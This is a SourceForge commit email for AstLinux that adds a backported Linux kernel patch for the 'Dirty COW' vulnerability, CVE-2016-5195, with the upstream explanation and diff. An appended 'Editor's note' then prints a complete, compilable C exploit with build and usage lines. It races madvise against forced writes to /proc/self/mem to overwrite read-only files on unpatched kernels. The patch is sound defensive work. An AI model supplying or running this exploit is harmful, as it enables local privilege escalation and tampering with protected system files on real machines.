From: <abe...@us...> - 2016-10-21 14:26:39
Revision: 7903
          http://sourceforge.net/p/astlinux/code/7903
Author:   abelbeck
Date:     2016-10-21 14:26:37 +0000 (Fri, 21 Oct 2016)

Log Message:
-----------
linux, fix "Dirty COW" CVE-2016-5195 privilege escalation vulnerability

Added Paths:
-----------
    branches/1.0/project/astlinux/kernel-patches/linux-810-fix-CVE-2016-5195.patch

Added: branches/1.0/project/astlinux/kernel-patches/linux-810-fix-CVE-2016-5195.patch
===================================================================
--- branches/1.0/project/astlinux/kernel-patches/linux-810-fix-CVE-2016-5195.patch    (rev 0)
+++ branches/1.0/project/astlinux/kernel-patches/linux-810-fix-CVE-2016-5195.patch    2016-10-21 14:26:37 UTC (rev 7903)
@@ -0,0 +1,146 @@
+From 243f858d7045b710a31c377112578387ead4dde1 Mon Sep 17 00:00:00 2001
+From: Michal Hocko <mh...@su...>
+Date: Sun, 16 Oct 2016 11:55:00 +0200
+Subject: mm, gup: close FOLL MAP_PRIVATE race
+
+commit 19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619 upstream.
+
+faultin_page drops FOLL_WRITE after the page fault handler has done the
+CoW, and then we retry follow_page_mask to get our CoWed page. This is
+racy, however, because the page might have been unmapped by that time,
+and so we would have to take the page fault again, this time without
+CoW. This would cause page cache corruption for FOLL_FORCE on
+MAP_PRIVATE read-only mappings, with obvious consequences.
+
+This is an ancient bug that was actually already fixed once by Linus
+eleven years ago in commit 4ceb5db9757a ("Fix get_user_pages() race
+for write access"), but that fix was then undone due to problems on
+s390 by commit f33ea7f404e5 ("fix get_user_pages bug"), because s390
+didn't have proper dirty pte tracking until abf09bed3cce ("s390/mm:
+implement software dirty bits"). As Hugh Dickins pointed out, this
+wasn't a problem at the time because madvise relied on mmap_sem held
+for write up until 0a27a14a6292 ("mm: madvise avoid exclusive
+mmap_sem"); since then, however, we can race with madvise, which can
+unmap the freshly CoWed page, or with KSM, and corrupt the content of
+the shared page.
+
+This patch is based on Linus' approach of not clearing FOLL_WRITE
+after the CoW page fault (aka VM_FAULT_WRITE), instead introducing
+FOLL_COW to note this fact. The flag is then rechecked during
+follow_pfn_pte to enforce the page fault again if we do not see the
+CoWed page. Linus suggested checking pte_dirty again, as s390 is OK
+now, but that would make backporting to some old kernels harder. So
+instead let's just make sure that vm_normal_page sees a pure anonymous
+page.
+
+This guarantees we are seeing a real CoW page. Introduce
+can_follow_write_pte, which checks pte_write and falls back to
+PageAnon on forced write faults that have already passed CoW. Thanks
+to Hugh for pointing out that special care has to be taken for KSM
+pages, because our CoWed page might have been merged with a KSM one
+and keep its PageAnon flag.
+
+Fixes: 0a27a14a6292 ("mm: madvise avoid exclusive mmap_sem")
+Reported-by: Phil "not Paul" Oester <ke...@li...>
+Disclosed-by: Andy Lutomirski <lu...@ke...>
+Signed-off-by: Linus Torvalds <tor...@li...>
+Signed-off-by: Michal Hocko <mh...@su...>
+[bwh: Backported to 3.2:
+ - Adjust filename, context, indentation
+ - The 'no_page' exit path in follow_page() is different, so open-code the
+   cleanup
+ - Delete a now-unused label]
+Signed-off-by: Ben Hutchings <be...@de...>
+---
+ include/linux/mm.h |  1 +
+ mm/memory.c        | 39 ++++++++++++++++++++++++++++-----------
+ 2 files changed, 29 insertions(+), 11 deletions(-)
+
+diff --git a/include/linux/mm.h b/include/linux/mm.h
+index e5ee683..16394da 100644
+--- a/include/linux/mm.h
++++ b/include/linux/mm.h
+@@ -1527,6 +1527,7 @@ struct page *follow_page(struct vm_area_struct *, unsigned long address,
+ #define FOLL_MLOCK	0x40	/* mark page as mlocked */
+ #define FOLL_SPLIT	0x80	/* don't return transhuge pages, split them */
+ #define FOLL_HWPOISON	0x100	/* check page is hwpoisoned */
++#define FOLL_COW	0x4000	/* internal GUP flag */
+ 
+ typedef int (*pte_fn_t)(pte_t *pte, pgtable_t token, unsigned long addr,
+ 			void *data);
+diff --git a/mm/memory.c b/mm/memory.c
+index 675b211..2917e9b 100644
+--- a/mm/memory.c
++++ b/mm/memory.c
+@@ -1427,6 +1427,24 @@ int zap_vma_ptes(struct vm_area_struct *vma, unsigned long address,
+ }
+ EXPORT_SYMBOL_GPL(zap_vma_ptes);
+ 
++static inline bool can_follow_write_pte(pte_t pte, struct page *page,
++					unsigned int flags)
++{
++	if (pte_write(pte))
++		return true;
++
++	/*
++	 * Make sure that we are really following CoWed page. We do not really
++	 * have to care about exclusiveness of the page because we only want
++	 * to ensure that once COWed page hasn't disappeared in the meantime
++	 * or it hasn't been merged to a KSM page.
++	 */
++	if ((flags & FOLL_FORCE) && (flags & FOLL_COW))
++		return page && PageAnon(page) && !PageKsm(page);
++
++	return false;
++}
++
+ /**
+  * follow_page - look up a page descriptor from a user-virtual address
+  * @vma: vm_area_struct mapping @address
+@@ -1509,10 +1527,13 @@ split_fallthrough:
+ 	pte = *ptep;
+ 	if (!pte_present(pte))
+ 		goto no_page;
+-	if ((flags & FOLL_WRITE) && !pte_write(pte))
+-		goto unlock;
+ 
+ 	page = vm_normal_page(vma, address, pte);
++	if ((flags & FOLL_WRITE) && !can_follow_write_pte(pte, page, flags)) {
++		pte_unmap_unlock(ptep, ptl);
++		return NULL;
++	}
++
+ 	if (unlikely(!page)) {
+ 		if ((flags & FOLL_DUMP) ||
+ 		    !is_zero_pfn(pte_pfn(pte)))
+@@ -1555,7 +1576,7 @@ split_fallthrough:
+ 			unlock_page(page);
+ 		}
+ 	}
+-unlock:
++
+ 	pte_unmap_unlock(ptep, ptl);
+ out:
+ 	return page;
+@@ -1789,17 +1810,13 @@ int __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
+ 				 * The VM_FAULT_WRITE bit tells us that
+ 				 * do_wp_page has broken COW when necessary,
+ 				 * even if maybe_mkwrite decided not to set
+-				 * pte_write. We can thus safely do subsequent
+-				 * page lookups as if they were reads. But only
+-				 * do so when looping for pte_write is futile:
+-				 * in some cases userspace may also be wanting
+-				 * to write to the gotten user page, which a
+-				 * read fault here might prevent (a readonly
+-				 * page might get reCOWed by userspace write).
++				 * pte_write. We cannot simply drop FOLL_WRITE
++				 * here because the COWed page might be gone by
++				 * the time we do the subsequent page lookups.
+ 				 */
+ 				if ((ret & VM_FAULT_WRITE) &&
+ 				    !(vma->vm_flags & VM_WRITE))
+-					foll_flags &= ~FOLL_WRITE;
++					foll_flags |= FOLL_COW;
+ 
+ 				cond_resched();
+ 			}
+-- 
+cgit v0.12
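
Editor's note: for readers wondering what the race described in the commit
message looks like from userspace, the publicly known CVE-2016-5195
proof-of-concept pattern races a FOLL_FORCE write through /proc/self/mem
against madvise(MADV_DONTNEED) on a private read-only mapping. The sketch
below is illustrative only -- the file name dirtycow-demo.c, the LOOPS
count, and the command-line interface are assumptions, and success is
timing-dependent. It shows the pattern the kernel patch above defeats; it
is not part of the AstLinux change.

/* dirtycow-demo.c -- minimal sketch of the CVE-2016-5195 race (illustrative).
 *
 * Maps <file> read-only with MAP_PRIVATE, then races two threads:
 *   1) madvise(MADV_DONTNEED) repeatedly discards the private CoW copy;
 *   2) write(2) to /proc/self/mem forces a write via get_user_pages()
 *      with FOLL_FORCE, taking the code path patched above.
 * On unpatched kernels the write can land in the shared page cache page.
 *
 * Build: gcc -pthread -o dirtycow-demo dirtycow-demo.c
 * Usage: ./dirtycow-demo <read-only-file> <string>
 */
#include <fcntl.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

#define LOOPS 1000000		/* arbitrary; the race is probabilistic */

static void *map;		/* private read-only mapping of the target */
static const char *payload;
static size_t payload_len;

/* Thread 1: throw away the private copy so follow_page() must refault. */
static void *madvise_thread(void *arg)
{
	(void)arg;
	for (int i = 0; i < LOOPS; i++)
		madvise(map, payload_len, MADV_DONTNEED);
	return NULL;
}

/* Thread 2: /proc/self/mem writes use FOLL_FORCE, so the kernel CoWs the
 * read-only page and retries the lookup -- the window the fix closes. */
static void *write_thread(void *arg)
{
	(void)arg;
	int fd = open("/proc/self/mem", O_RDWR);
	if (fd < 0) {
		perror("open /proc/self/mem");
		return NULL;
	}
	for (int i = 0; i < LOOPS; i++) {
		lseek(fd, (off_t)(uintptr_t)map, SEEK_SET);
		write(fd, payload, payload_len);
	}
	close(fd);
	return NULL;
}

int main(int argc, char **argv)
{
	pthread_t t1, t2;
	struct stat st;
	int fd;

	if (argc != 3) {
		fprintf(stderr, "usage: %s <read-only-file> <string>\n", argv[0]);
		return 1;
	}
	payload = argv[2];
	payload_len = strlen(payload);

	fd = open(argv[1], O_RDONLY);
	if (fd < 0 || fstat(fd, &st) < 0) {
		perror(argv[1]);
		return 1;
	}
	map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
	if (map == MAP_FAILED) {
		perror("mmap");
		return 1;
	}

	pthread_create(&t1, NULL, madvise_thread, NULL);
	pthread_create(&t2, NULL, write_thread, NULL);
	pthread_join(t1, NULL);
	pthread_join(t2, NULL);
	/* On a vulnerable kernel, <file> may now contain <string>. */
	return 0;
}

The demo only motivates the fix: with FOLL_COW, a forced write that loses
its CoW copy is refaulted instead of being silently retried as a read
against the shared page.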